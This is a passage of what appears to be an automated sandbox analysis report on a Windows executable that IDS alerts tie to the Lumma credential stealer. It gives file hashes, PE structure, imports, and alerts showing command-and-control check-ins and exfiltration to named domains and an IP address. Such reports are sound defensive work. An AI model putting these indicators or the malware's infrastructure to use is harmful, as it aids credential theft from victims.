No..04-10-2023 02:39:31:.Closing File..04-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\050f90c8-2a23-42b8-958b-88e6ef30b61e.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/VR9WL07oXGZnYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tR9WLxXGZnZGh3mlind9i4ufFXpAXkru
MD5:	9D85D4B75E446857CE3D750299B2AF1A
SHA1:	3CD9576D0A07B9E4454F4FF4DDF8D18EFBB764B4
SHA-256:	D3C44F50FD2912C92DAF009689B221515709E00C839A8DA425078C96F2D6053A
SHA-512:	1C63A091EF404FC446F1A789D33258FE9F6AD25C80375CADADF0829BC5DCD70A16A8E30E664D0A02F39E7A3D10B9E56AD7F9CA9D733A877726C1DD043B14842F
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\a282d18c-4137-4d70-9022-174eb3ea79e8.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\a4495932-3e99-4b80-a658-81d1588d2b8b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/IkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07mWL07oXGZd:zwZG2b3mlind9i4ufFXpAXkrfUs0CWLk
MD5:	9431A1C2A3C1BEFE8F3925B1B333DC34
SHA1:	4E77620153F74BE80B9D533FD16826A276113460
SHA-256:	9C81A3C6CA676D3D45D2C43A2204E3B78DFB3C0082A1748B67CD9F95AD419ABC
SHA-512:	56AC05EAAAD17DBBA09E224C4472D1792C5B038ECB976E9DD107817999ACF7E8A217D0E6A61983777569426A7493661CF2CE16FF6753FE8517EFA360B52C871F
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\cb7ec70a-0f05-4528-b259-ac2297228a02.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.163177919243492
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BigProject.exe
File size:	1'600'512 bytes
MD5:	98acefb3b4d697642895f954c5256a49
SHA1:	6db25168111275435e21e68773dc88d1cf86cfd9
SHA256:	36ae8fda3c54b17e1a0609c07aab00a27c435244e19990d45327e21b16455718
SHA512:	6fbc24ff91e727b10b9761a4d517f43c992d36e1d968b926304086f6d9176b918ab26833f6a8b834996e847b9bda9147e6b1c06544c1cb500c6fd3be155d5c30
SSDEEP:	24576:D/nhP4bMsbpX48FjzODzbSPkRuWPcHYF+Xe61PVLpCeRseo4nEc+vi2ofHiNiOEP:D/nhP0xh48NzObik7A4pMiNe2dUZ
TLSH:	6D75B754F6AB5222E0533EF418BF23669261A830307ECE57F0446E5654C1336EB9FDAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VS.Q.2...2...2...J`..2.......2.......2.......2.......2..b....2...2...2.......2.......2..Rich.2..........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x564c49
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67661A2B [Sat Dec 21 01:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8f05acdfcf958ad49d502159c452d8a0

Entrypoint Preview

Instruction
call 00007F9BA46FFC28h
jmp 00007F9BA46FF40Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
jmp 00007F9BA46FF5A7h
mov ecx, dword ptr [edx+0Ch]
cmp dword ptr [ebp+0Ch], ecx
jc 00007F9BA46FF59Ch
mov eax, dword ptr [edx+08h]
add eax, ecx
cmp dword ptr [ebp+0Ch], eax
jc 00007F9BA46FF59Eh
add edx, 28h
cmp edx, esi
jne 00007F9BA46FF579h
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F9BA46FF58Bh
push esi
call 00007F9BA46FFEECh
test eax, eax
je 00007F9BA46FF5B2h
mov eax, dword ptr fs:[00000018h]
mov esi, 005721ECh
mov edx, dword ptr [eax+04h]
jmp 00007F9BA46FF596h
cmp edx, eax
je 00007F9BA46FF5A2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F9BA46FF582h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F9BA46FF599h
mov byte ptr [005721F0h], 00000001h
call 00007F9BA46FF76Ah
call 00007F9BA46FFBF9h
test al, al
jne 00007F9BA46FF596h
xor al, al
pop ebp
ret
call 00007F9BA46FFBECh
test al, al
jne 00007F9BA46FF59Ch
push 00000000h
call 00007F9BA46FFBE1h
pop ecx
jmp 00007F9BA46FF57Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [005721F1h], 00000000h
je 00007F9BA46FF596h
mov al, 01h
pop ebp
ret

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17318c	0x104	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x174000	0x14e3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16cd70	0x38	.data
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x16cdc0	0x18	.data
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x16ccb0	0x40	.data
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x173000	0x184	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16a723	0x16a800	1bfc7c9c27367cf9909e520f007313e1	False	0.33425377155172414	data	6.004703947953677	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x16c000	0x6564	0x6200	a02509725dc2de9ca596adfdf9eb4b49	False	0.27144451530612246	data	4.414053226945556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x173000	0xdd8	0xe00	8dda1530378a2027ab77c74ea2449135	False	0.41573660714285715	data	5.432830471357009	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x174000	0x14e3c	0x15000	6361b94c704a21b74e0b037562cd0272	False	0.6721772693452381	data	6.822739287920647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, QueryPerformanceFrequency, CreateFileW, GetSystemInfo, GetProcAddress, FreeLibrary, QueryPerformanceCounter, GetTempPathW, WriteFile, CloseHandle, GetModuleHandleW, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess
SHELL32.dll	ShellExecuteW
MSVCP140.dll	?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@M@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z, ?good@ios_base@std@@QBE_NXZ, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Xlength_error@std@@YAXPBD@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z
WININET.dll	InternetOpenUrlW, InternetOpenW, InternetReadFile, InternetCloseHandle
VCRUNTIME140.dll	__current_exception, memcpy, memchr, _CxxThrowException, __std_exception_destroy, __CxxFrameHandler3, memcmp, memmove, __current_exception_context, _except_handler4_common, __std_exception_copy, memset
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vswprintf_s, __p__commode, _set_fmode
api-ms-win-crt-heap-l1-1-0.dll	malloc, _callnewh, _set_new_mode, free
api-ms-win-crt-utility-l1-1-0.dll	rand, srand
api-ms-win-crt-time-l1-1-0.dll	_time64
api-ms-win-crt-runtime-l1-1-0.dll	_exit, exit, _initterm_e, _initterm, _get_narrow_winmain_command_line, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, _seh_filter_exe, terminate, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _controlfp_s, _initialize_onexit_table, _invalid_parameter_noinfo_noreturn, _register_onexit_function, _crt_atexit
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr, ceil

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T13:17:19.960727+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.5	58190	1.1.1.1	53	UDP
2024-12-21T13:17:20.422776+0100	2058360	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)	1	192.168.2.5	64951	1.1.1.1	53	UDP
2024-12-21T13:17:21.986852+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:21.986852+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:23.478133+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:23.478133+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49709	172.67.197.170	443	TCP
2024-12-21T13:17:24.747780+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:24.747780+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:25.519678+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:25.519678+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49715	172.67.197.170	443	TCP
2024-12-21T13:17:27.065928+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49731	172.67.197.170	443	TCP
2024-12-21T13:17:27.065928+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49731	172.67.197.170	443	TCP
2024-12-21T13:17:29.394631+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49741	172.67.197.170	443	TCP
2024-12-21T13:17:29.394631+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49741	172.67.197.170	443	TCP
2024-12-21T13:17:31.548202+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49750	172.67.197.170	443	TCP
2024-12-21T13:17:31.548202+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49750	172.67.197.170	443	TCP
2024-12-21T13:17:33.876391+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49756	172.67.197.170	443	TCP
2024-12-21T13:17:33.876391+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49756	172.67.197.170	443	TCP
2024-12-21T13:17:34.549518+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49756	172.67.197.170	443	TCP
2024-12-21T13:17:36.710322+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49762	172.67.197.170	443	TCP
2024-12-21T13:17:36.710322+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49762	172.67.197.170	443	TCP
2024-12-21T13:17:40.621968+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.5	49773	172.67.197.170	443	TCP
2024-12-21T13:17:40.621968+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49773	172.67.197.170	443	TCP
2024-12-21T13:17:41.374342+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49773	172.67.197.170	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 13:17:12.963179111 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:12.963227987 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:12.963321924 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:12.982376099 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:12.982395887 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.204956055 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.205079079 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.279571056 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.279614925 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.280582905 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.280664921 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.286468029 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.327351093 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.675729990 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.675843000 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.675936937 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.675998926 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.676021099 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.676069021 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.676103115 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.676147938 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.676182985 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.676227093 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.684160948 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.684216976 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.684257984 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.684307098 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.692543983 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.692636013 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.692711115 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.692770004 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.700989962 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.701075077 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.701145887 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.701200008 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.795430899 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.795505047 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.795557022 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.795613050 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.867935896 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.868030071 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.868069887 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.868132114 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.872185946 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.872256994 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.872275114 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.872324944 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.882647991 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.882824898 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.882843971 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.882895947 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.890492916 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.890569925 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.890588045 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.890633106 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.898284912 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.898365021 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.906064987 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.906150103 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.906184912 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.906254053 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.913959980 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.914041042 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.914073944 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.914120913 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.921617985 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.921705008 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.921730995 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.921787024 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.929474115 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.929543018 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.937417984 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.937484980 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.937500954 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.937556028 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.943511009 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.943573952 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.943597078 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.943650007 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.949244976 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.949299097 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.949413061 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.949462891 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.955271006 CET	443	49704	185.199.110.133	192.168.2.5
Dec 21, 2024 13:17:14.955364943 CET	49704	443	192.168.2.5	185.199.110.133
Dec 21, 2024 13:17:14.961194038 CET	443	49704	185.199.110.133	192.168.2.5
